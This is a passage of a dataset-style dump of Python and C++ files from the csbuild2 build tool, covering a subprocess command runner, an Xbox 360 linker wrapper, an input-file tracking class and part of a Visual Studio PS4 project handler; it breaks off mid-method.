a\n\t\tmutex.\n\n\t\t:param inputProject:\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFiles: List of files to build\n\t\t:type inputFiles: list[input_file.InputFile]\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Linker(\n\t\t\t\"Linking {}{} ({}-{}-{})...\",\n\t\t\tinputProject.outputName,\n\t\t\tself._getOutputExtension(inputProject.projectType),\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFiles), env=self._getEnv(inputProject), cwd=inputProject.outputDir)\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFiles)\n\t\treturn self._getOutputFiles(inputProject)\n" }, { "alpha_fraction": 0.7471131682395935, "alphanum_fraction": 0.7489277720451355, "avg_line_length": 33.63999938964844, "blob_id": "3da563980ca6f098c6b76b1dcc88da89c89a0fd6", "content_id": "ddf6e19233e499d67935ce5b466d468fd6b41247", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6062, "license_type": "no_license", "max_line_length": 107, "num_lines": 175, "path": "/csbuild/commands.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: commands\n\t:synopsis: Utility functions for running commands across multiple threads with real-time output processing\n\t\tand semi-real-time synchronized output printing\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport subprocess\nimport threading\n\nfrom . import shared_globals, log, perf_timer\nfrom ._utils import PlatformUnicode, queue\nfrom ._utils.decorators import TypeChecked\n\nif sys.version_info[0] >= 3:\n\tfrom collections.abc import Callable\nelse:\n\tfrom collections import Callable\n\nif sys.version_info >= (3,3,0):\n\tfrom shlex import quote\nelse:\n\tfrom pipes import quote\n\nqueueOfLogQueues = queue.Queue()\nstopEvent = object()\n\ndef PrintStaggeredRealTimeOutput():\n\t\"\"\"\n\tHandle output put into the queue of queues\n\tGrab the first queue from the outer queue, then process all output from that queue\n\tuntil told to stop before moving on to the next queue. 
Each process that emits output creates\n\tits own queue; this ensures output from a single process is printed as soon as it's available,\n\tbut output from multiple processes is not interleaved.\n\t\"\"\"\n\twhile True:\n\t\tinnerQueue = queueOfLogQueues.GetBlocking()\n\t\tif innerQueue is stopEvent:\n\t\t\tbreak\n\t\twhile True:\n\t\t\tmsg = innerQueue.GetBlocking()\n\t\t\tif msg is stopEvent:\n\t\t\t\tbreak\n\t\t\tmsg[0](msg[1])\n\nclass _sharedStreamProcessingData(object):\n\tdef __init__(self):\n\t\tself.queue = None\n\t\tself.lock = threading.Lock()\n\ndef LogNonInterleavedOutput(logFunction, shared, msg):\n\t\"\"\"\n\tHandle output from a process by putting it into the process-specific queue,\n\twhich is itself placed into the queue of queues lazily if it's not already there.\n\n\t:param logFunction: Function to actually print the log message\n\t:type logFunction: Callable\n\t:param shared: shared data passed by Run\n\t:type shared: _sharedStreamProcessingData\n\t:param msg: A single line of output\n\t:type msg: str\n\t\"\"\"\n\t#Double-check lock pattern\n\tif shared.queue is None:\n\t\twith shared.lock:\n\t\t\tif shared.queue is None:\n\t\t\t\tshared.queue = queue.Queue()\n\t\t\t\tqueueOfLogQueues.Put(shared.queue)\n\tshared.queue.Put((logFunction, msg))\n\ndef DefaultStdoutHandler(shared, msg):\n\t\"\"\"\n\tDefault handler for process stdout, logs with log.Stdout\n\t:param shared: shared data passed by Run\n\t:type shared: _sharedStreamProcessingData\n\t:param msg: A single line of output\n\t:type msg: str\n\t\"\"\"\n\tLogNonInterleavedOutput(log.Stdout, shared, msg)\n\ndef DefaultStderrHandler(shared, msg):\n\t\"\"\"\n\tDefault handler for process stderr, logs with log.Stderr\n\t:param shared: shared data passed by Run\n\t:type shared: _sharedStreamProcessingData\n\t:param msg: A single line of output\n\t:type msg: str\n\t\"\"\"\n\tLogNonInterleavedOutput(log.Stderr, shared, msg)\n\n@TypeChecked(cmd=list, stdout=(Callable, type(None)), stderr=(Callable, type(None)))\ndef Run(cmd, stdout=DefaultStdoutHandler, stderr=DefaultStderrHandler, **kwargs):\n\t\"\"\"\n\tRun a process, collecting its output in realtime. Each line of output will be passed\n\tto the appropriate callback (stdout or stderr) one line at a time - the callback will be\n\tcalled once for each line. This function will block until the command exits.\n\n\t:param cmd: The command to run as a list of arguments, with the first parameter being the executable\n\t:type cmd: list\n\t:param stdout: Callback that will be called for each line of stdout at the moment it's emitted.\n\t:type stdout: Callable, None\n\t:param stderr: Callback that will be called for each line of stderr at the moment it's emitted.\n\t:type stderr: Callable, None\n\t:param kwargs: Additional arguments to be passed to subprocess.Popen(). 
See subprocess documentation\n\t:type kwargs: any\n\t:return: Tuple of return code, stdout as a single block string, and stderr as a single block string\n\t:rtype: tuple[int, str, str]\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Commands\"):\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\" \".join(quote(s) for s in cmd))\n\n\t\toutput = []\n\t\terrors = []\n\t\tshared = _sharedStreamProcessingData()\n\n\t\tdef _streamOutput(pipe, outlist, callback):\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\tline = PlatformUnicode(pipe.readline())\n\t\t\t\texcept IOError:\n\t\t\t\t\tcontinue\n\t\t\t\t# Empty string means pipe was closed, possibly due to process exit, and we can leave the loop.\n\t\t\t\t# A blank line output by the pipe would be returned as \"\\n\"\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\t#Callback excludes newline\n\t\t\t\tif callback is not None:\n\t\t\t\t\tcallback(shared, line.rstrip(\"\\n\\r\"))\n\t\t\t\toutlist.append(line)\n\n\t\tproc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)\n\n\t\toutputThread = threading.Thread(target=_streamOutput, args=(proc.stdout, output, stdout))\n\t\terrorThread = threading.Thread(target=_streamOutput, args=(proc.stderr, errors, stderr))\n\n\t\toutputThread.start()\n\t\terrorThread.start()\n\n\t\toutputThread.join()\n\t\terrorThread.join()\n\n\t\tproc.wait()\n\n\t\tproc.stdout.close()\n\t\tproc.stderr.close()\n\n\t\tif shared.queue is not None:\n\t\t\tshared.queue.Put(stopEvent)\n\n\t\treturn proc.returncode, \"\".join(output), \"\".join(errors)\n" }, { "alpha_fraction": 0.6798418760299683, "alphanum_fraction": 0.6859118938446045, "avg_line_length": 36.48147964477539, "blob_id": "ba4e0c649257f9b714ba72c0d94624674b45d443", "content_id": "e694de5ee415236828cf443ad2e11fdb35b6d802", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7084, "license_type": "no_license", "max_line_length": 135, "num_lines": 189, "path": "/csbuild/tools/linkers/xbox_360_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: xbox_360_linker\n\t:synopsis: Xbox 360 linker tool for C/C++ and assembly.\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom .linker_base import LinkerBase\nfrom ..common import FindLibraries\nfrom ..common.xbox_360_tool_base import Xbox360BaseTool\nfrom ..common.tool_traits import HasDebugLevel\nfrom ... import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\n\nclass Xbox360Linker(Xbox360BaseTool, LinkerBase):\n\t\"\"\"\n\tXbox 360 linker tool implementation for c/c++ and asm.\n\t\"\"\"\n\tsupportedPlatforms = {\"Windows\"}\n\tsupportedArchitectures = {\"xcpu\"}\n\tinputGroups = {\".obj\", \".o\"}\n\toutputFiles = {\".exe\", \".lib\", \".dll\"}\n\tcrossProjectDependencies = {\".lib\"}\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tXbox360BaseTool.__init__(self, projectSettings)\n\t\tLinkerBase.__init__(self, projectSettings)\n\n\tdef _getOutputFiles(self, project):\n\t\toutputPath = os.path.join(project.outputDir, project.outputName)\n\t\toutputFiles = {\n\t\t\tcsbuild.ProjectType.Application: [\"{}.exe\".format(outputPath)],\n\t\t\tcsbuild.ProjectType.StaticLibrary: [\"{}.lib\".format(outputPath)],\n\t\t\tcsbuild.ProjectType.SharedLibrary: [\"{}.dll\".format(outputPath)],\n\t\t}[project.projectType]\n\n\t\t# Output files when not building a static library.\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\toutputFiles.extend([\n\t\t\t\t\"{}.ilk\".format(outputPath),\n\t\t\t\t\"{}.pe\".format(outputPath),\n\t\t\t\t\"{}.xdb\".format(outputPath),\n\t\t\t])\n\n\t\t\t# Add the PDB file if debugging is enabled.\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\toutputFiles.append(\"{}.pdb\".format(outputPath))\n\n\t\t# Can't predict these things, linker will make them if it decides to.\n\t\tpossibleFiles = [\"{}.exp\".format(outputPath), \"{}.lib\".format(outputPath)]\n\t\toutputFiles.extend([filename for filename in possibleFiles if os.access(filename, os.F_OK)])\n\n\t\treturn tuple(set(outputFiles))\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\tcmdExe = os.path.join(self._xbox360BinPath, \"lib.exe\")\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\n\t\telse:\n\t\t\tcmdExe = os.path.join(self._xbox360BinPath, \"link.exe\")\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getCustomArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryArgs(project)\n\n\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\tdef _findLibraries(self, project, libs):\n\t\tallLibraryDirectories = list(self._libraryDirectories)\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".lib\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\t# These are extensions of the files that can be output from the linker or 
librarian.\n\t\t# The library extensions should represent the file types that can actually be linked against.\n\t\text = {\n\t\t\tcsbuild.ProjectType.Application: \".exe\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".lib\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".lib\",\n\t\t}\n\t\treturn ext.get(projectType, None)\n\n\tdef SetupForProject(self, project):\n\t\tXbox360BaseTool.SetupForProject(self, project)\n\t\tLinkerBase.SetupForProject(self, project)\n\n\t\t# Xbox 360 does not support linking directly against dynamic libraries so we\n\t\t# need to remove any project dependencies of that type from the library list.\n\t\tfor dependProject in project.dependencies:\n\t\t\tif dependProject.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\t\tdel self._actualLibraryLocations[dependProject.outputName]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\n\t\t\t\"/ERRORREPORT:NONE\",\n\t\t\t\"/NOLOGO\",\n\t\t\t\"/MACHINE:PPCBE\",\n\t\t\t\"/SUBSYSTEM:XBOX\"\n\t\t]\n\n\t\t# Arguments for any project that is not a static library.\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\targs.append(\"/DEBUG\")\n\t\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\t\targs.append(\"/DLL\")\n\t\treturn args\n\n\tdef _getCustomArgs(self):\n\t\treturn self._linkerFlags\n\n\tdef _getLibraryArgs(self, project):\n\t\t# Static libraries don't require the default libraries to be linked, so only add them when building an application or shared library.\n\t\targs = [] if project.projectType == csbuild.ProjectType.StaticLibrary else [\n\t\t\t\"/LIBPATH:{}\".format(self._xbox360LibPath),\n\t\t\t\"xboxkrnl.lib\",\n\t\t\t\"xbdm.lib\",\n\t\t]\n\t\targs.extend(list(self._actualLibraryLocations.values()))\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutExt = {\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".dll\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".lib\",\n\t\t}.get(project.projectType, \".exe\")\n\n\t\toutputPath = os.path.join(project.outputDir, project.outputName)\n\t\targs = [\"/OUT:{}{}\".format(outputPath, outExt)]\n\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\targs.append(\"/IMPLIB:{}.lib\".format(outputPath))\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\t#args.append(\"/PGD:{}.pgd\".format(outputPath))\n\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\targs.append(\"/PDB:{}.pdb\".format(outputPath))\n\n\t\treturn args\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n" }, { "alpha_fraction": 0.7254986763000488, "alphanum_fraction": 0.7270164489746094, "avg_line_length": 28.564102172851562, "blob_id": "b0cd7a028aca229a02149e0386957800e3f5cbdf", "content_id": "6a8329b23ffa91f16d0055756d3cc496119e6dc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4612, "license_type": "no_license", "max_line_length": 116, "num_lines": 156, "path": "/csbuild/_build/input_file.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: input_file\n\t:synopsis: Information about a file used as a tool input\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport hashlib\nimport sys\n\nfrom .._utils.decorators import TypeChecked\nfrom .._utils import PlatformBytes\nfrom .._utils import PlatformString\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\timport types\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = types.ClassType\n\nclass InputFile(object):\n\t\"\"\"\n\tRepresents an input file along with its tool history.\n\tStores both the full set of tools used to create the file,\n\tas well as a link to the previous input source that created it\n\n\t:param filename: The filename\n\t:type filename: str, bytes\n\n\t:param sourceInputs: The previous input in the chain (if None, this represents the first input)\n\t:type sourceInputs: ordered_set.OrderedSet[InputFile]\n\n\t:param upToDate: whether or not the file was up to date (i.e., no build was performed)\n\t:type upToDate: bool\n\t\"\"\"\n\tdef __init__(self, filename, sourceInputs=None, upToDate=False):\n\t\tself._filename = os.path.abspath(PlatformString(filename))\n\t\tself._sourceInputs = sourceInputs\n\t\tself._toolsUsed = set()\n\t\tself._upToDate = upToDate\n\t\tself._uniqueDirectoryId = None\n\t\tif sourceInputs is not None:\n\t\t\tif isinstance(sourceInputs, InputFile):\n\t\t\t\t# pylint: disable=protected-access\n\t\t\t\tself._toolsUsed |= sourceInputs._toolsUsed\n\t\t\telse:\n\t\t\t\tfor sourceInput in sourceInputs:\n\t\t\t\t\t# pylint: disable=protected-access\n\t\t\t\t\tself._toolsUsed |= sourceInput._toolsUsed\n\n\tdef __repr__(self):\n\t\tmainFileDir = os.path.dirname(sys.modules[\"__main__\"].__file__)\n\t\ttry:\n\t\t\treturn os.path.relpath(self._filename, mainFileDir).replace(\"\\\\\", \"/\")\n\t\texcept:\n\t\t\treturn self._filename\n\n\t@TypeChecked(tool=(_classType, _typeType))\n\tdef AddUsedTool(self, tool):\n\t\t\"\"\"\n\t\tAdd a tool to the set of tools that have been used on this file\n\n\t\t:param tool: The used tool\n\t\t:type tool: type\n\t\t\"\"\"\n\t\tself._toolsUsed.add(tool)\n\n\t@TypeChecked(tool=(_classType, _typeType), _return=bool)\n\tdef WasToolUsed(self, tool):\n\t\t\"\"\"\n\t\tCheck if a tool was used in the process of creating this file (or any file used in the input chain that led to it)\n\n\t\t:param 
tool: The tool to check\n\t\t:type tool: type\n\t\t:return: True if the tool was used, False otherwise\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn tool in self._toolsUsed\n\n\t@property\n\tdef filename(self):\n\t\t\"\"\"\n\t\tGet the absolute path to the file\n\n\t\t:return: Absolute path to the file\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._filename\n\n\t@property\n\tdef sourceInputs(self):\n\t\t\"\"\"\n\t\tGet the InputFile that was used to create this file, if any\n\n\t\t:return: The InputFile that was used to create this file\n\t\t:rtype: list[InputFile] or None\n\t\t\"\"\"\n\t\treturn self._sourceInputs\n\n\t@property\n\tdef upToDate(self):\n\t\t\"\"\"\n\t\tGet whether or not the file was already up to date. If true, no build was performed.\n\n\t\t:return: Whether or not the file was up to date\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn self._upToDate\n\n\t@property\n\tdef toolsUsed(self):\n\t\t\"\"\"\n\t\tGet the list of tools used to make this input.\n\n\t\t:return: list of used tools\n\t\t:rtype: set\n\t\t\"\"\"\n\t\treturn self._toolsUsed\n\n\t@property\n\tdef uniqueDirectoryId(self):\n\t\t\"\"\"\n\t\tGet the unique identifier for the directory containing the file.\n\n\t\t:return: Directory unique identifier.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tif self._uniqueDirectoryId is None:\n\t\t\tself._uniqueDirectoryId = hashlib.md5(PlatformBytes(os.path.dirname(self.filename))).hexdigest()\n\t\treturn self._uniqueDirectoryId\n" }, { "alpha_fraction": 0.6857143044471741, "alphanum_fraction": 0.6857143044471741, "avg_line_length": 10.333333015441895, "blob_id": "c4cef9f6d666d0974a16dd95d49094dc4ad6dcae", "content_id": "e5ae84c9a516313ba7e58b6fd0d08c88d40f92e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 35, "license_type": "no_license", "max_line_length": 19, "num_lines": 3, "path": "/functional_tests/basic_cpp_test/fail_link/header.hpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#pragma once\n\nvoid hello_world();\n\n" }, { "alpha_fraction": 0.76484614610672, "alphanum_fraction": 0.7658001184463501, "avg_line_length": 37.824073791503906, "blob_id": "5b45a8a77b558183486e6d15e1ed6a400c73388d", "content_id": "656cf444c5bbf2174f94f15c3efe08db34bf2db3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8386, "license_type": "no_license", "max_line_length": 159, "num_lines": 216, "path": "/csbuild/tools/project_generators/visual_studio/platform_handlers/ps4.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2018 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps4\n\t:synopsis: Built-in Visual Studio platform handler for outputting PS4 project files.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\n\nfrom . import VsBasePlatformHandler\n\ndef _ignore(_):\n\tpass\n\nclass VsPs4PlatformHandler(VsBasePlatformHandler):\n\t\"\"\"\n\tVisual Studio platform handler as a base class, containing project writing functionality for the PS4 platform.\n\t\"\"\"\n\tdef __init__(self, buildTarget, vsInstallInfo):\n\t\tVsBasePlatformHandler.__init__(self, buildTarget, vsInstallInfo)\n\n\t@staticmethod\n\tdef GetVisualStudioPlatformName():\n\t\t\"\"\"\n\t\tGet the name that is recognizable by Visual Studio for the current platform.\n\n\t\t:return: Visual Studio platform name.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn \"ORBIS\"\n\n\t@staticmethod\n\tdef GetOutputExtensionIfDebuggable(projectOutputType):\n\t\t\"\"\"\n\t\tGet the file extension of the input project output type for the current platform.\n\t\tOnly applies to debuggable projects. Any other project types should return `None`.\n\n\t\t:param projectOutputType: Final output type of a project.\n\t\t:type projectOutputType: any\n\n\t\t:return: Application extension.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn {\n\t\t\tcsbuild.ProjectType.Application: \".elf\",\n\t\t}.get(projectOutputType, None)\n\n\t@staticmethod\n\tdef GetIntellisenseAdditionalOptions(project, buildSpec):\n\t\t\"\"\"\n\t\tGet any additional NMake options to configure intellisense.\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:return: Additional NMake options.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn \"$(ORBISIntelliSense)\"\n\n\tdef WriteGlobalImportTargets(self, parentXmlNode, project):\n\t\t\"\"\"\n\t\tWrite global import target needed for the project.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\n\t\timportGroupXmlNode = self._addXmlNode(parentXmlNode, \"ImportGroup\")\n\t\timportGroupXmlNode.set(\"Condition\", \"'$(Platform)'=='{}'\".format(vsPlatformName))\n\n\t\timportXmlNode = self._addXmlNode(importGroupXmlNode, \"Import\")\n\t\timportXmlNode.set(\"Condition\", r\"'$(ConfigurationType)' == 'Makefile' and Exists('$(VCTargetsPath)\\Platforms\\$(Platform)\\SCE.Makefile.$(Platform).targets')\")\n\t\timportXmlNode.set(\"Project\", r\"$(VCTargetsPath)\\Platforms\\$(Platform)\\SCE.Makefile.$(Platform).targets\")\n\n\tdef WriteProjectConfiguration(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the project configuration nodes for this platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: 
csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tprojectConfigXmlNode = self._addXmlNode(parentXmlNode, \"ProjectConfiguration\")\n\t\tprojectConfigXmlNode.set(\"Include\", vsBuildTarget)\n\n\t\tconfigXmlNode = self._addXmlNode(projectConfigXmlNode, \"Configuration\")\n\t\tconfigXmlNode.text = vsConfig\n\n\t\tplatformXmlNode = self._addXmlNode(projectConfigXmlNode, \"Platform\")\n\t\tplatformXmlNode.text = vsPlatformName\n\n\tdef WriteConfigPropertyGroup(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite the property group nodes for the project's configuration and platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, vsPlatformName)\n\n\t\tpropertyGroupXmlNode = self._addXmlNode(parentXmlNode, \"PropertyGroup\")\n\t\tpropertyGroupXmlNode.set(\"Label\", \"Configuration\")\n\t\tpropertyGroupXmlNode.set(\"Condition\", \"'$(Configuration)|$(Platform)'=='{}'\".format(vsBuildTarget))\n\n\t\tplatformToolsetXmlNode = self._addXmlNode(propertyGroupXmlNode, \"PlatformToolset\")\n\t\tplatformToolsetXmlNode.text = \"Clang\"\n\n\t\tconfigTypeXmlNode = self._addXmlNode(propertyGroupXmlNode, \"ConfigurationType\")\n\t\tconfigTypeXmlNode.text = \"Makefile\"\n\n\tdef WriteImportProperties(self, parentXmlNode, project, buildSpec, vsConfig):\n\t\t\"\"\"\n\t\tWrite any special import properties for this platform.\n\n\t\t:param parentXmlNode: Parent project XML node.\n\t\t:type parentXmlNode: xml.etree.ElementTree.SubElement\n\n\t\t:param project: Visual Studio project data.\n\t\t:type project: csbuild.tools.project_generators.visual_studio.internal.VsProject\n\n\t\t:param buildSpec: Build spec being written to use with the project data.\n\t\t:type buildSpec: tuple[str, str, str]\n\n\t\t:param vsConfig: Visual Studio configuration being written.\n\t\t:type vsConfig: str\n\t\t\"\"\"\n\t\tvsPlatformName = self.GetVisualStudioPlatformName()\n\t\tvsBuildTarget = \"{}|{}\".format(vsConfig, 